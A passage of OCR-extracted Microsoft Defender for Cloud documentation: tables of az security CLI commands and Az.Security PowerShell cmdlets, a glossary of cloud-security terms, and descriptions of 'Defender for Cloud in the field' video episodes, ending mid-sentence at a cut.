Shows an auto provisioning setting. 


Updates your automatic provisioning 
settings on the subscription. 


View your security automations. 


Creates security automation event hub 
action. 


Creates security automation event hub 
action. 


Creates security automation logic app 
action. 


Creates security automation logic app 
action. 


Creates security automation workspace 
action. 


Creates security automation workspace 
action. 


Creates security automation rule. 


Creates security automation rule set. 


Type 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 


az security automation-rule-set 
create 


az security automation-rule 
create 


az security automation-scope 


az security automation-scope 
create 


az security automation-source 


az security automation-source 
create 


az security automation 
create_or_update 


az security automation delete 


az security automation list 


az security automation show 


az security automation validate 


az security contact 

az security contact create 
az security contact delete 
az security contact list 

az security contact show 


az security discovered-security- 
solution 


az security discovered-security- 
solution list 


az security discovered-security- 
solution show 


az security external-security- 
solution 


Description 


Creates security automation rule set. 


Creates security automation rule. 


Creates security automation scope. 


Creates security automation scope. 


Creates security automation source. 


Creates security automation source. 


Creates or update a security automation. 


Deletes a security automation. 


List all security automations under 
subscription/resource group. 


Shows a security automation. 


Validates a security automation model 
before create or update. 


View your security contacts. 
Creates a security contact. 
Deletes a security contact. 
List security contact. 


Shows a security contact. 


View your discovered security solutions. 


List the discovered security solutions. 


Shows a discovered security solution. 


View your external security solutions. 


Type 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 
Core 
Core 
Core 
Core 


Core 


Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 


az security external-security- 
solution list 


az security external-security- 
solution show 


az security iot-alerts 
az security iot-alerts delete 


az security iot-alerts list 


az security iot-alerts show 


az security iot-analytics 
az security iot-analytics list 
az security iot-analytics show 


az security iot-recommendations 


az security iot-recommendations 
list 


az security iot-recommendations 
show 


az security iot-solution 

az security iot-solution create 
az security iot-solution delete 
az security iot-solution list 

az security iot-solution show 
az security iot-solution update 


az security jit-policy 


az security jit-policy list 


az security jit-policy show 


Description 


List the external security solutions. 


Shows an external security solution. 


View loT Security aggregated alerts. 
Dismiss an aggregated loT Security Alert. 


List all yours loT Security solution 
aggregated alerts. 


Shows a single aggregated alert of yours loT 
Security solution. 


View loT Security Analytics metrics. 
List all loT security Analytics metrics. 
Shows loT Security Analytics metrics. 


View loT Security aggregated 
recommendations. 


List all yours loT Security solution 
aggregated recommendations. 


Shows a single aggregated recommendation 
of yours loT Security solution. 


Manage your loT Security solution. 
Create your loT Security solution. 
Delete your loT Security solution. 
List all loT Security solutions. 
Shows a loT Security solution. 
Update your loT Security solution. 


Manage your Just in Time network access 
policies. 


List your Just in Time network access 
policies. 


Shows a Just in Time network access policy. 


Type 


Core 


Core 


Core 
Core 


Core 


Core 


Core 
Core 
Core 


Core 


Core 


Core 


Core 
Core 
Core 
Core 
Core 
Core 


Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 


az security location 


az security location list 


az security location show 


az security pricing 


az security pricing create 


az security pricing list 


az security pricing show 


az security regulatory- 
compliance-assessments 


az security regulatory- 
compliance-assessments list 


az security regulatory- 
compliance-assessments show 


az security regulatory- 
compliance-controls 


az security regulatory- 
compliance-controls list 


az security regulatory- 
compliance-controls show 


az security regulatory- 
compliance-standards 


az security regulatory- 
compliance-standards list 


az security regulatory- 
compliance-standards show 


Description 


Shows the Microsoft Defender for Cloud 
Home region location. 


Shows the Microsoft Defender for Cloud 
Home region location. 


Shows the Microsoft Defender for Cloud 
Home region location. 


Enables managing the Azure Defender plan 
for the subscription. 


Updates the Azure defender plan for the 
subscription. 


Shows the Azure Defender plans for the 
subscription. 


Shows the Azure Defender plan for the 
subscription. 


Regulatory compliance assessments. 


Get details and state of assessments 
mapped to selected regulatory compliance 
control. 


Shows supported regulatory compliance 
details and state for selected assessment. 


Regulatory compliance controls. 


List supported of regulatory compliance 
controls details and state for selected 
standard. 


Shows a regulatory compliance details state 
for selected standard. 


Regulatory compliance standards. 


List supported regulatory compliance 
standards details and state results. 


Shows a regulatory compliance details state 
for selected standard. 


Type 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 


az security secure-score-control- 
definitions 


az security secure-score-control- 
definitions list 


az security secure-score-controls 


az security secure-score-controls 
list 


az security secure-score-controls 
list_by_score 


az secu rity secure-scores 


az security secure-scores list 


az security secure-scores show 


az security security-solutions 


az security security-solutions- 
reference-data 


az security security-solutions- 
reference-data list 


az security security-solutions list 


az security setting 

az security setting list 

az security setting show 

az security setting update 

az security sub-assessment 

az security sub-assessment list 
az security sub-assessment show 
az security task 


az security task list 


Description 


Secure score control definitions. 


Get details of secure score control 
definitions. 


Secure score controls. 


List supported of secure score controls 
details and state for scope. 


List supported of secure score controls 
details and state for selected score. 


Secure scores. 


List of secure-scores details and state 
results. 


Shows a secure score details for selected 
initiative. 


Display all security solutions at the 
subscription level. 


Display all security solutions reference data 
at the subscription level. 


Display all security solutions reference data 
at the subscription level. 


Display all security solutions at the 
subscription level. 


View your security settings. 

List security settings. 

Shows a security setting. 

Updates a security setting. 

View your security sub assessments. 
List all security sub assessment results. 
Shows a security sub assessment. 

View security tasks (recommendations). 


List security tasks (recommendations). 


Type 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 
Core 
Core 
Core 
Core 
Core 
Core 
Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 
az security task show 


az security topology 


az security topology list 


az security topology show 


az security va 


az security va sql 


az security va sql baseline 


az security va sql baseline delete 


az security va sql baseline list 


az security va sql baseline set 


az security va sql baseline show 


az security va sql baseline update 


az security va sql results 


az security va sql results list 


az security va sql results show 


az security va sql scans 


az security va sql scans list 


Description 
Shows a security task (recommendation). 


Shows the network topology in your 
subscription. 


Shows the network topology in your 
subscription. 


Shows the network topology in your 
subscription. 


View Vulnerability Assessment. 


View Sql Vulnerability Assessment scan 
results and manage baseline. 


View and manage Sql Vulnerability 
Assessment baseline. 


Delete Sql Vulnerability Assessment rule 
baseline. 


View Sql Vulnerability Assessment baseline 
for all rules. 


Sets Sql Vulnerability Assessment baseline. 
Replaces the current baseline. 


View Sql Vulnerability Assessment rule 
baseline. 


Update Sql Vulnerability Assessment rule 


baseline. Replaces the current rule baseline. 


View Sql Vulnerability Assessment scan 
results. 


View all Sql Vulnerability Assessment scan 
results. 


View Sql Vulnerability Assessment scan 
results. 


View Sql Vulnerability Assessment scan 
summaries. 


List all Sql Vulnerability Assessment scan 
summaries. 


Type 
Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 


az security va sql scans show 


az security workspace-setting 


az security workspace-setting 
create 


az security workspace-setting 
delete 


az security workspace-setting list 


az security workspace-setting 
show 


Description 


View Sql Vulnerability Assessment scan 
summaries. 


Shows the workspace settings in your 
subscription - these settings let you control 
which workspace will hold your security 
data. 


Creates a workspace settings in your 
subscription - these settings let you control 
which workspace will hold your security 
data. 


Deletes the workspace settings in your 
subscription - this will make the security 
events on the subscription be reported to 
the default workspace. 


Shows the workspace settings in your 
subscription - these settings let you control 
which workspace will hold your security 
data. 


Shows the workspace settings in your 
subscription - these settings let you control 
which workspace will hold your security 
data. 


Type 


Core 


Core 


Core 


Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


Az.Security 


Reference 


Azure Security Center gives you control over the security of your Azure subscriptions 


and other machines that you connected to it outside of Azure. 


Security 


Add-AzSecurityAdaptiveNetworkHardening 


Add-AzSecuritySqlVulnerabilityAssessmentBaseline 


Confirm-AzSecurityAutomation 


Disable-AzlotSecurityAnalyticsAggregatedAlert 


Disable-AzSecurityAdvancedThreatProtection 


Enable-AzSecurityAdvancedThreatProtection 


Get-AzAlertsSuppressionRule 


Get-AzAllowedConnection 


Get-AzDeviceSecurityGroup 


Get-AzDiscoveredSecuritySolution 


Get-AzExternalSecuritySolution 
Get-AzlotSecurityAnalytics 


Get-AzlotSecurityAnalyticsAggregatedAlert 


Enforces the given rules on the 
NSG(s) listed in the request 


Add SQL vulnerability assessment 
baseline. 


Validates the security automation 
model before create or update. Any 
validation errors are returned to the 
client 


Dismiss lot aggregated alert 


Disables the advanced threat 
protection policy for a storage / 
cosmosDB account. 


Enables the advanced threat 
protection policy for a storage / 
cosmosDB account. 


Gets alerts suppression rules. 


Used to display allowed traffic 
between resources for the 
subscription 


Get device security group (loT Hub 
security) 


Gets security solutions that were 
discovered by Azure Security Center 


Get external security solution 
Get loT security analytics 


Get loT security aggregated alert 


Get-AzlotSecurityAnalyticsAggregatedRecommendation 


Get-AzlotSecuritySolution 
Get-AzJitNetworkAccessPolicy 


Get-AzRegulatoryComplianceAssessment 


Get-AzRegulatoryComplianceControl 


Get-AzRegulatoryComplianceStandard 


Get-AzSecurityAdaptiveApplicationControl 


Get-AzSecurityAdaptiveApplicationControlGroup 


Get-AzSecurityAdaptiveNetworkHardening 


Get-AzSecurityAdvancedThreatProtection 


Get-AzSecurityAlert 


Get-AzSecurityAssessment 


Get-AzSecurityAssessmentMetadata 


Get-AzSecurityAutomation 


Get-AzSecurityAutoProvisioningSetting 


Get-AzSecurityCompliance 


Get-AzSecurityContact 


Get-AzSecurityLocation 


Get loT security aggregated 
recommendation 


Get loT security solution 
Gets the JIT network access policies 


Gets regulatory compliance 
assessments 


Gets regulatory compliance controls 


Gets regulatory compliance 
standards 


Gets a list of application control 
VM/server groups for the 
subscription. 


Gets an application control 
VM/server group. 


Gets a list of Adaptive Network 
Hardenings resources in scope of 
an extended resource. 


Gets the advanced threat protection 
policy for a storage / cosmosDB 
account. 


Gets security alerts that were 
detected by Azure Security Center 


Gets security assessments and their 
results on a subscription 


Gets security assessments types and 
metadta in a subscription. 


Gets security automations 


Gets the security automatic 
provisioning settings 


Get the security compliance of a 
subscription over time 


Gets security contacts that were 
configured on this subscription 


Gets the location where Azure 
Security Center will automatically 


Get-AzSecurityPricing 


Get-AzSecuritySecureScore 


Get-AzSecuritySecureScoreControl 


Get-AzSecuritySecureScoreControlDefinition 


Get-AzSecuritySetting 


Get-AzSecuritySolution 


Get-AzSecuritySolutionsReferenceData 


Get-AzSecuritySqlVulnerabilityAssessmentBaseline 


Get-AzSecuritySqlVulnerabilityAssessmentScanRecord 


Get-AzSecuritySqlVulnerabilityAssessmentScanResult 


Get-AzSecuritySubAssessment 


Get-AzSecurityTask 


Get-AzSecurityTopology 


Get-AzSecurityWorkspaceSetting 


Get-AzSqllnformationProtectionPolicy 


New-AzAlertsSuppressionRuleScope 


save data for the specific 
subscription 


Gets the Azure Defender plans for a 
subscription in Azure Security 
Center. 


Gets security secure scores and 
their results on a subscription 


Gets security secure score controls 
and their results on a subscription 


Gets security secure score control 
definitions on a subscription 


Get security settings in Azure 
Security Center 


Get Security Solutions 


Get Security Solutions Reference 
Data 


Get SQL vulnerability assessment 
baseline. 


Gets SQL vulnerability assessment 
scan summary. 


Gets SQL vulnerability assessment 
scan results. 


Gets sub assessments results in a 
subscription. 


Gets the security tasks that Azure 
Security Center recommends you to 
do in order to strengthen your 
security posture. 


Gets a list of Security Topologies on 
a subscription 


Gets the configured security 
workspace settings on a 
subscription. 


Retrieves the effective tenant SQL 
information protection policy. 


Helper cmdlet to create 


New- 
AzDeviceSecurityGroupAllowlistCustomAlertRuleObject 


New- 
AzDeviceSecurityGroupDenylistCustomAlertRuleObject 


New- 
AzDeviceSecurityGroupThresholdCustomAlertRuleObject 


New-AzDeviceSecurityGroupTimeWindowRuleObject 


New- 
AzlotSecuritySolutionRecommendationConfigurationObject 


New-AzlotSecuritySolutionUserDefinedResourcesObject 


New-AzSecurityAutomation 


New-AzSecurityAutomationActionObject 


New-AzSecurityAutomationRuleObject 


New-AzSecurityAutomationRuleSetObject 


New-AzSecurityAutomationScopeObject 


New-AzSecurityAutomationSourceObject 


Remove-AzAlertsSuppressionRule 
Remove-AzDeviceSecurityGroup 
Remove-AzlotSecuritySolution 
Remove-AzJitNetworkAccessPolicy 


Remove-AzSecurityAssessment 


PSIScopeElement. 


Create new allow list custom alert 
rule for device security group (loT 
Security) 


Create new deny list custom alert 
rule for device security group (loT 
Security) 


Create new threshold custom alert 
rule for device security group (loT 
Security) 


Create new time window rule for 
device security group (loT Security) 


Create new recommendation 
configuration for iot security 
solution 


Create new user defined resources 
for iot security solution 


Creates new security automation 


Creates new security automation 
action object 


Creates security automation rule 
object 


Creates security automation rule set 
object 


Creates security automation scope 
object 


Creates security automation source 
object 


Deletes an alerts suppression rule. 
Delete device security group 
Delete loT security solution 

Deletes a JIT network access policy. 


Deletes a security assessment result 
from a subscription. 


Remove-AzSecurityAssessmentMetadata 


Remove-AzSecurityAutomation 


Remove-AzSecurityContact 


Remove-AzSecuritySqlVulnerabilityAssessmentBaseline 


Remove-AzSecurityWorkspaceSetting 


Set-AzAlertsSuppressionRule 


Set-AzDeviceSecurityGroup 


Set-AzlotSecuritySolution 


Set-AzJitNetworkAccessPolicy 
Set-AzSecurityAlert 


Set-AzSecurityAssessment 


Set-AzSecurityAssessmentMetadata 


Set-AzSecurityAutoProvisioningSetting 


Set-AzSecurityContact 


Set-AzSecurityPricing 


Deletes a security assessment 
metadata from a subscription. 


Deletes security automation 
Deletes a security contact. 


Removes SQL vulnerability 
assessment baseline. 


Deletes the security workspace 
setting for this subscription. 


Create or update an alerts 
suppression rule. 


Create or update device security 
group 


Create or update loT security 
solution 


Updates JIT network access policy. 
Updates a security alert state. 


Create or update a security 
assessment result on a resource 


Creates or updates a security 
assessment type. 


Updates automatic provisioning 
setting 


Updates a security contact for a 
subscription. 


Enables or disables Microsoft 
Defender plans for a subscription in 
Microsoft Defender for Cloud. 


©® Note 


For CloudPosture 
(Defender Cloud Security 
Posture Management), the 
agentless extensions E 
will not be enabled when 
using this command. To 


Set-AzSecuritySetting 


Set-AzSecuritySqlVulnerabilityAssessmentBaseline 


Set-AzSecurityWorkspaceSetting 


Set-AzSqllnformationProtectionPolicy 


Start-AzJitNetworkAccessPolicy 


Update-AzlotSecuritySolution 


enable extensions, please 
use the Azure Policy 
definition or scripts in the 
Microsoft Defender for 
Cloud Community 
Repository £. 


Update a security setting in Azure 
Security Center 


Sets new SQL vulnerability 
assessment baseline on a specific 
database discards old baseline if 
any exists. 


Updates the workspace settings for 
the subscription. 


Sets the effective tenant SQL 
information protection policy. 


Invokes a temporary network access 
request. 


Update one or more of the 
following properties in loT security 
solution: tags, recommendation 
configuration, user defined 
resources 


Defender for Cloud glossary 


Article e 08/13/2023 


This glossary provides a brief description of important terms and concepts for the 
Microsoft Defender for Cloud platform. Select the Learn more links to go to related 
terms in the glossary. This glossary can help you to learn and use the product tools 
quickly and effectively. 


A 


AAC 


Adaptive application controls are an intelligent and automated solution for defining 
allowlists of known-safe applications for your machines. See Adaptive Application 
Controls. 


AAD 


Azure Active Directory (Azure AD) is a cloud-based identity and access management 
service. See Adaptive Application Controls. 


ACR Tasks 


A suite of features within Azure container registry. See Frequently asked questions - 
Azure Container Registry. 


Adaptive network hardening 


Adaptive network hardening provides recommendations to further harden the network 
security groups (NSG) rules. See What is Adaptive Network Hardening?. 


ADO 


Azure DevOps provides developer services for allowing teams to plan work, collaborate 
on code development, and build and deploy applications. See What is Azure DevOps? 


AKS 


Azure Kubernetes Service, Microsoft's managed service for developing, deploying, and 
managing containerized applications. See Kubernetes concepts. 


Alerts 


Alerts defend your workloads in real-time so you can react immediately and prevent 
security events from developing. See Security alerts and incidents. 


ANH 


Adaptive network hardening. Learn how to improve your network security posture with 
adaptive network hardening. 


APT 


Advanced Persistent Threats See the video: Understanding APTs. 


Arc-enabled Kubernetes 


Azure Arc-enabled Kubernetes allows you to attach and configure Kubernetes clusters 
running anywhere. You can connect your clusters running on other public cloud 
providers or clusters running on your on-premises data center. See What is Azure Arc- 
enabled Logic Apps? (Preview). 


ARG 


Azure Resource Graph-an Azure service designed to extend Azure Resource 
Management by providing resource exploration with the ability to query at scale across 
a given set of subscriptions so that you can effectively govern your environment. See 
Azure Resource Graph Overview. 


ARM 


Azure Resource Manager-the deployment and management service for Azure. See Azure 
Resource Manager overview. 


ASB 


Azure Security Benchmark provides recommendations on how you can secure your 


cloud solutions on Azure. See Azure Security Benchmark. 


Attack Path Analysis 


A graph-based algorithm that scans the cloud security graph, exposes attack paths and 
suggests recommendations as to how best remediate issues that will break the attack 
path and prevent successful breach. See What is attack path analysis?. 


Auto-provisioning 


To make sure that your server resources are secure, Microsoft Defender for Cloud uses 
agents installed on your servers to send information about your servers to Microsoft 
Defender for Cloud for analysis. You can use auto provisioning to deploy the Azure 
Monitor Agent on your servers. Learn how to configure auto provision. 


Azure Policy for Kubernetes 


A pod that extends the open-source Gatekeeper v3 “ and registers as a web hook to 
Kubernetes admission control making it possible to apply at-scale enforcements, and 
safeguards on your clusters in a centralized, consistent manner. For more information, 
see Protect your Kubernetes workloads and Understand Azure Policy for Kubernetes 
clusters. 


B 


Bicep 


Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure 
resources. It provides concise syntax, reliable type safety, and support for code reuse. 
See Bicep tutorial. 


Blob storage 


Azure Blob Storage is the high scale object storage service for Azure and a key building 
block for data storage in Azure. See what is Azure blob storage?. 


C 


Cacls 


Change access control list, Microsoft Windows native command-line utility often used 
for modifying the security permission on folders and files. See Access control lists. 


CIS Benchmark 


(Kubernetes) Center for Internet Security benchmark. See CIS. 


Cloud security graph 


The cloud security graph is a graph-based context engine that exists within Defender for 
Cloud. The cloud security graph collects data from your multicloud environment and 
other data sources. See What is the cloud security graph?. 


CORS 


Cross origin resource sharing, an HTTP feature that enables a web application running 
under one domain to access resources in another domain. See CORS. 


CNAPP 


Cloud Native Application Protection Platform. See Build cloud native applications in 


Azure č. 


CNCF 


Cloud Native Computing Foundation. Learn how to build CNCF projects by using Azure 


Kubernetes service. 


CSPM 


Cloud Security Posture Management. See Cloud Security Posture Management (CSP). 


CWPP 


Cloud Workload Protection Platform. See CWPP. 


D 


Data Aware Security Posture 


Data-aware security posture automatically discovers datastores containing sensitive 
data, and helps reduce risk of data breaches. Learn about data-aware security posture. 
Defender agent 


The DaemonSet that is deployed on each node, collects signals from hosts using eBPF 
technology, and provides runtime protection. The agent is registered with a Log 
Analytics workspace, and used as a data pipeline. However, the audit log data isn't 
stored in the Log Analytics workspace. It is deployed under AKS Security profile in AKS 
clusters and as an Arc extension in Arc enabled Kubernetes clusters. For more 


information, see Architecture for each Kubernetes environment. 


DDOS Attack 


Distributed denial-of-service, a type of attack where an attacker sends more requests to 
an application than the application is capable of handling. See DDOS FAQs. 


E 


EASM 


External Attack Surface Management. See EASM Overview. 


EDR 


Endpoint Detection and Response. See Microsoft Defender for Endpoint. 


EKS 


Amazon Elastic Kubernetes Service, Amazon's managed service for running Kubernetes 
on AWS without needing to install, operate, and maintain your own Kubernetes control 
plane or nodes. SeeEKS Z. 


eBPF 


Extended Berkley Packet Filter What is eBPF? Z 


FIM 


File Integrity Monitoring. Learn about (file Integrity Monitoring in Microsoft Defender 
for Cloud. 


FTP 


File Transfer Protocol. Learn how to Deploy content using FTP. 


G 


GCP 


Google Cloud Platform. Learn how to onboard a GPC Project. 


GKE 


Google Kubernetes Engine, Google's managed environment for deploying, managing, 
and scaling applications using GCP infrastructure.|Deploy a Kubernetes workload using 
GPU sharing on your Azure Stack Edge Pro. 


Governance 


A set of rules and policies adopted by companies that run services in the cloud. The goal 
of cloud governance is to enhance data security, manage risk, and enable the smooth 
operation of cloud systems.Governance Overview. 


laaS 


Infrastructure as a service, a type of cloud computing service that offers essential 
compute, storage, and networking resources on demand, on a pay-as-you-go basis. 
What is laaS? Z. 


IAM 


Identity and Access management. Introduction to IAM”. 


JIT 


Just-in-Time VM access. Understanding just-in-time (JIT) VM access. 


K 


Kill Chain 


The series of steps that describe the progression of a cyberattack from reconnaissance 
to data exfiltration. Defender for Cloud's supported kill chain intents are based on the 
MITRE ATT&CK matrix. MITRE Attack Matrix £ . 


KQL 


Kusto Query Language - a tool to explore your data and discover patterns, identify 
anomalies and outliers, create statistical modeling, and more. KQL Overview. 


L 


LSA 


Local Security Authority. Learn about secure and use policies on virtual machines in 
Azure. 


M 


MCSB 


Microsoft Cloud Security Benchmark. See MCSB in Defender for Cloud. 


MDC 


Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and 
Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and 


multicloud (Amazon AWS and Google GCP) resources. What is Microsoft Defender for 
Cloud?. 


MDE 


Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to 
help enterprise networks prevent, detect, investigate, and respond to advanced threats. 
Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft 
Defender for Endpoint. 


MDVM 


Microsoft Defender Vulnerability Management. Learn how to enable vulnerability 
scanning with Microsoft Defender Vulnerability Management. 


MFA 


Multi-factor authentication, a process in which users are prompted during the sign-in 
process for an extra form of identification, such as a code on their cellphone or a 
fingerprint scan.How it works: Azure Multi Factor Authentication. 


MITRE ATT&CK 


A globally accessible knowledge base of adversary tactics and techniques based on real- 
world observations. MITRE ATT&CK Z. 


MMA 


Microsoft Monitoring Agent, also known as Log Analytics Agent|Log Analytics Agent 


Overview. 


N 


NGAV 


Next Generation Anti-Virus 


NIST 


National Institute of Standards and Technology. See National Institute of Standards and 
Technology Z . 


NSG 


Network Security Group. Learn about network security groups (NSGs). 


P 


PaaS 


Platform as a service (PaaS) is a complete development and deployment environment in 
the cloud, with resources that enable you to deliver everything from simple cloud-based 
apps to sophisticated, cloud-enabled enterprise applications. What is PaaS? Z . 


R 


RaMP 


Rapid Modernization Plan, guidance based on initiatives, giving you a set of deployment 
paths to more quickly implement key layers of protection. Learn about Zero Trust Rapid 
Modernization Plan. 


RBAC 


Azure role-based access control (Azure RBAC) helps you manage who has access to 
Azure resources, what they can do with those resources, and what areas they have 
access to. RBAC Overview. 


RDP 


Remote Desktop Protocol (RDP) is a sophisticated technology that uses various 
techniques to perfect the server's remote graphics' delivery to the client device. RDP 
Bandwidth Requirements. 


Recommendations 


Recommendations secure your workloads with step-by-step actions that protect your 
workloads from known security risks. What are security policies, initiatives, and 


recommendations?. 


Regulatory Compliance 


Regulatory compliance refers to the discipline and process of ensuring that a company 
follows the laws enforced by governing bodies in their geography or rules required. 
Regulatory Compliance Overview. 


S 


SAS 


Shared access signature that provides secure delegated access to resources in your 
storage account.Storage SAS Overview. 


SaaS 


Software as a service (SaaS) allows users to connect to and use cloud-based apps over 
the Internet. Common examples are email, calendaring, and office tools (such as 
Microsoft Office 365). SaaS provides a complete software solution that you purchase on 
a pay-as-you-go basis from a cloud service provider.What is SaaS? Z . 


Secure Score 


Defender for Cloud continually assesses your cross-cloud resources for security issues. It 
then aggregates all the findings into a single score that represents your current security 
situation: the higher the score, the lower the identified risk level. Learn more about 
security posture for Microsoft Defender for Cloud. 


Security Alerts 


Security alerts are the notifications generated by Defender for Cloud and Defender for 
Cloud plans when threats are identified in your cloud, hybrid, or on-premises 
environment.What are security alerts? 


Security Initiative 


A collection of Azure Policy Definitions, or rules, that are grouped together towards a 
specific goal or purpose. What are security policies, initiatives, and recommendations? 


Security Policy 


An Azure rule about specific security conditions that you want controlled.Understanding 
Security Policies. 


SIEM 


Security Information and Event Management. What is SIEM? 7 


SOAR 


Security Orchestration Automated Response, a collection of software tools designed to 
collect data about security threats from multiple sources and respond to low-level 
security events without human assistance. Learn more about SOAR. 


T 


TVM 


Threat and Vulnerability Management, a built-in module in Microsoft Defender for 
Endpoint that can discover vulnerabilities and misconfigurations in near real time and 
prioritize vulnerabilities based on the threat landscape and detections in your 
organization.Investigate weaknesses with Microsoft Defender for Endpoint's threat and 


vulnerability management. 


W 


WAF 


Web Application Firewall (WAF) provides centralized protection of your web applications 
from common exploits and vulnerabilities. Learn more about WAF. 


Z 


Zero- Trust 


A new security model that assumes breach and verifies each request as though it 
originated from an uncontrolled network. Learn more about Zero-Trust Security. 


Next steps 


Microsoft Defender for Cloud-overview 


New AWS connector in Microsoft 
Defender for Cloud 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, Or Serok joins 
Yuri Diogenes to share the new AWS connector in Microsoft Defender for Cloud, which 
was released at Ignite 2021. Or explains the use case scenarios for the new connector 
and how the new connector work. She demonstrates the onboarding process to connect 
AWS with Microsoft Defender for Cloud and talks about the centralized management of 


all security recommendations. 


° - Introduction 


° - Understanding the new AWS connector. 


° - Overview of the new onboarding experience. 


4:30 - Customizing recommendations for AWS workloads. 


7:03 - Beyond CSPM capabilities. 


11:14 - Demonstration of the recommendations and onboarding process. 


23:20 - Demonstration of how to customize AWS assessments. 


Recommended resources 
Learn more about the new AWS connector 
e Subscribe to Microsoft Security on YouTube 7 
e Follow us on social media: LinkedIn’ Twitter“ 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Integrate Azure Purview with Microsoft Defender for Cloud 


Integrate Microsoft Purview with 
Microsoft Defender for Cloud 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, David Trigano 
joins Yuri Diogenes to share the new integration of Microsoft Defender for Cloud with 


Microsoft Purview, which was released at Ignite 2021. 


David explains the use case scenarios for this integration and how the data classification 
is done by Microsoft Purview can help prioritize recommendations and alerts in 
Defender for Cloud. David also demonstrates the overall experience of data enrichment 
based on the information that flows from Microsoft Purview to Defender for Cloud. 


° - Overview of Microsoft Purview 


® - Integration with Microsoft Defender for Cloud 


e 3:48 - How the integration with Microsoft Purview helps to prioritize 
Recommendations in Microsoft Defender for Cloud 


e 5:26 - How the integration with Microsoft Purview helps to prioritize Alerts in 
Microsoft Defender for Cloud 


e 8:54 - Demonstration 


e 16:50 - Final considerations 


Recommended resources 

Learn more about the integration with Microsoft Purview. 
e Subscribe to Microsoft Security on YouTube & 
e Follow us on social media: Linkedln £ Twitter” 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Watch Episode 3 


Microsoft Defender for Containers 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, Maya Herskovic 
joins Yuri Diogenes to talk about Microsoft Defender for Containers. Maya explains 
what's new in Microsoft Defender for Containers, the new capabilities that are available, 
the new pricing model, and the multicloud coverage. Maya also demonstrates the 
overall experience of Microsoft Defender for Containers from the recommendations to 
the alerts that you may receive. 


e 1:09 - What's new in the Defender for Containers plan? 
e 4:42 - Change in the host level protection 
e 8:08 - How to migrate to the new plan? 


e 9:28 - Onboarding requirements 


e 11:45 - Improvements in the anomaly detection 
e 13:27 - Demonstration 


e 22:17 - Final considerations 


Recommended resources 

Learn more about Microsoft Defender for Containers. 
e Subscribe to Microsoft Security on YouTube & 
e Follow us on social media: LinkedIn’ Twitter“ 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Security posture management improvements 


Security posture management 
improvements in Microsoft Defender for 
Cloud 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, Lior Arviv joins 
Yuri Diogenes to talk about the cloud security posture management improvements in 
Microsoft Defender for Cloud. Lior explains the MITRE ATT&CK Framework integration 
with recommendations, the overall improvements of recommendations and the other 
fields added in the API. Lior also demonstrates the different ways to access the MITRE 
ATT&CK integration via filters and recommendations. 


e 1:24 - Security recommendation refresh time changes 


e 3:50 - MITRE ATT&CK Framework mapping to recommendations 


e 6:14 - Demonstration 
e 14:44 - Secure Score API updates 


e 18:54 - What's coming next 


Recommended resources 

Learn how to Review your security recommendations. 
e Subscribe to Microsoft Security on YouTube 7 
e Follow us on social media: Linkedln Z Twitter £ 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Microsoft Defender for Servers 


Microsoft Defender for Servers 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, Aviv Mor joins 
Yuri Diogenes to talk about Microsoft Defender for Servers updates, including the new 
integration with Microsoft Defender Vulnerability Management (formerly TVM). Aviv 
explains how this new integration with Defender Vulnerability Management works and 
the advantages of this integration. Aviv covers the easy experience to onboard, software 
inventory, the integration with MDE for Linux, and the Defender for Servers support for 


the new multicloud connector for AWS. 


e 1:22 - Overview of the announcements for Microsoft Defender for Servers 


e 5:50 - Migration path from Qualys VA to Microsoft Defender Vulnerability 


Management 


e 7:12 - Defender Vulnerability Management capabilities in Defender for Servers 


e 8:38 - Threat detections for Defender for Servers 
e 9:52 - Defender for Servers in AWS 


e 12:23 - Onboard process for Defender Vulnerability Management in an on- 


premises scenario 


e 13:20 - Demonstration 


Recommended resources 


Learn how to Investigate weaknesses with Microsoft Defender Vulnerability 
Management. 


e Subscribe to Microsoft Security on YouTube & 
e Follow us on social media: Linkedln £ Twitter“ 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Lessons Learned from the Field 


Lessons learned from the field with 
Microsoft Defender for Cloud 


Article e 04/27/2023 


Episode description: In this episode Carlos Faria, Microsoft Cybersecurity Consultant 
